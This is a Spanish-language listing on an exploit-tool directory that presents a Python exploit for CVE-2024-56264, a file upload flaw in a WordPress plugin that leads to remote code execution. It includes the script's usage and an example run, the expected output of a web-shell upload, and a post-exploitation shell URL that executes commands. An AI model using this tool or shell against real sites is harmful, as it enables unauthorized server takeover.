Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-56264 — Exploit en Python para CVE-2024-56264, una vulnerabilidad de carga arbitraria de archivos en el plugin ACF City Selector de WordPress <=1.14.0, que permite ejecución remota de código mediante carga de web shell. | Kitploit
Herramientas/GitHubGitHub/dpakmrya/cve-2024-56264
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubdpakmrya/cve-2024-56264

CVE-2024-56264

Exploit en Python para CVE-2024-56264, una vulnerabilidad de carga arbitraria de archivos en el plugin ACF City Selector de WordPress <=1.14.0, que permite ejecución remota de código mediante carga de web shell.

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-56264

WordPress ACF City Selector - Exploit de subida arbitraria de archivos (CVE-2024-56264)

Resumen

Este repositorio contiene un exploit para CVE-2024-56264, que es una vulnerabilidad de subida arbitraria de archivos encontrada en el plugin de WordPress ACF City Selector (versiones <= 1.14.0). Esta vulnerabilidad permite a un atacante subir un archivo PHP malicioso (web shell) a una instancia vulnerable de WordPress y ejecutar comandos arbitrarios en el servidor.

Detalles del CVE

  • ID del CVE: CVE-2024-56264
  • Fecha de publicación: 2 de enero de 2025
  • Plugin afectado: ACF City Selector
  • Versiones vulnerables: <= 1.14.0
  • Impacto: Ejecución remota de código (RCE) mediante subida de archivos sin restricciones

Descripción

El plugin ACF City Selector no valida correctamente los archivos subidos, lo que permite a los atacantes evadir las restricciones y subir archivos PHP arbitrarios. Una vez que se sube un archivo PHP malicioso, un atacante puede ejecutar comandos del sistema de forma remota, lo que conduce al compromiso total del servidor.

Requisitos

📌 Dependencias

Asegúrate de tener instalado lo siguiente antes de ejecutar el script:

  • Python 3.x
  • Módulo requests (instálalo usando: pip install requests)

Puedes instalar todas las dependencias necesarias usando:

pip install -r requirements.txt

🚀 Uso

Ejecutando el exploit:

usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Ejemplo:

python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Salida esperada

Tras una explotación exitosa, deberías ver:

[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-explotación

Si tiene éxito, accede al shell subido mediante:

http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Esto permite la ejecución remota de comandos en el servidor.

⚠ Descargo de responsabilidad

Este script está pensado solo para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal y puede acarrear graves consecuencias. El autor no es responsable del mal uso de este exploit.

Descargar herramienta